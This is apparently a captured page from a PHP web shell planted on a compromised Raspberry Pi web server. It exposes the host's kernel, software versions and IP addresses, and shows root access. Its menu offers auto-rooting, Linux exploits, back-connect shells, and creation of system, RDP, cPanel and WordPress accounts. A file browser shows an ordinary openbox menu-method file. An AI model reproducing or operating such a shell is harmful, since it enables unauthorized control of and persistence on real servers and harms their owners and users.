Linux lorencats.com 5.10.103-v7l+ #1529 SMP Tue Mar 8 12:24:00 GMT 2022 armv7l
Apache/2.4.59 (Raspbian)
: 10.0.0.29 | : 216.73.216.10
Cant Read [ /etc/named.conf ]
7.3.31-1~deb10u7
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
etc /
menu-methods /
[ HOME SHELL ]
Name
Size
Permission
Action
menu-xdg
1.36
KB
-rwxr-xr-x
openbox
1.81
KB
-rwxr-xr-x
xdg-desktop-entry-spec-apps
1.43
KB
-rwxr-xr-x
xdg-desktop-entry-spec-dirs
1.28
KB
-rwxr-xr-x
xdg-desktop-entry-spec-session...
1.5
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : openbox
#!/usr/bin/install-menu !include menu.h compat="menu-1" outputencoding="UTF-8" genmenu="debian-menu.xml" rootprefix="/var/lib/openbox/" userprefix=".config/openbox/" treewalk="(M)" function xml_escape($s) = replace(replace(replace(replace(replace($s, \ "&", "&"), \ ">", ">"), \ "<", "<"), \ "'", "'"), \ "\"", """) supported x11= nstring(level(), " ") "<item label='" xml_escape(title()) "'" ifnempty(icon(), " icon='" xml_escape(icon()) "'") ">\n" \ nstring(level(), " ") " <action name='Execute'><execute>" xml_escape($command) "</execute></action>\n" \ nstring(level(), " ") "</item>\n" text= nstring(level(), " ") "<item label='" xml_escape(title()) "'" ifnempty(icon(), " icon='" xml_escape(icon()) "'") ">\n" \ nstring(level(), " ") " <action name='Execute'><execute>" xml_escape(term()) "</execute></action>\n" \ nstring(level(), " ") "</item>\n" wm= nstring(level(), " ") "<item label='" xml_escape(title()) "'" ifnempty(icon(), " icon='" xml_escape(icon()) "'") ">\n" \ nstring(level(), " ") " <action name='Restart'><execute>" xml_escape($command) "</execute></action>\n" \ nstring(level(), " ") "</item>\n" endsupported startmenu= nstring(level(), " ") "<menu id='" xml_escape($section) "' label='" xml_escape(title()) "'>\n" endmenu= nstring(level(), " ") "</menu>\n" preoutput= "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\n<!-- Automatically generated file. Do not edit (see /usr/share/doc/menu/html) -->\n\n<openbox_menu xmlns=\"http://openbox.org/\"\n xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"\n xsi:schemaLocation=\"http://openbox.org/\n file:///usr/share/openbox/menu.xsd\">\n\n" postoutput= "\n</openbox_menu>\n"
Close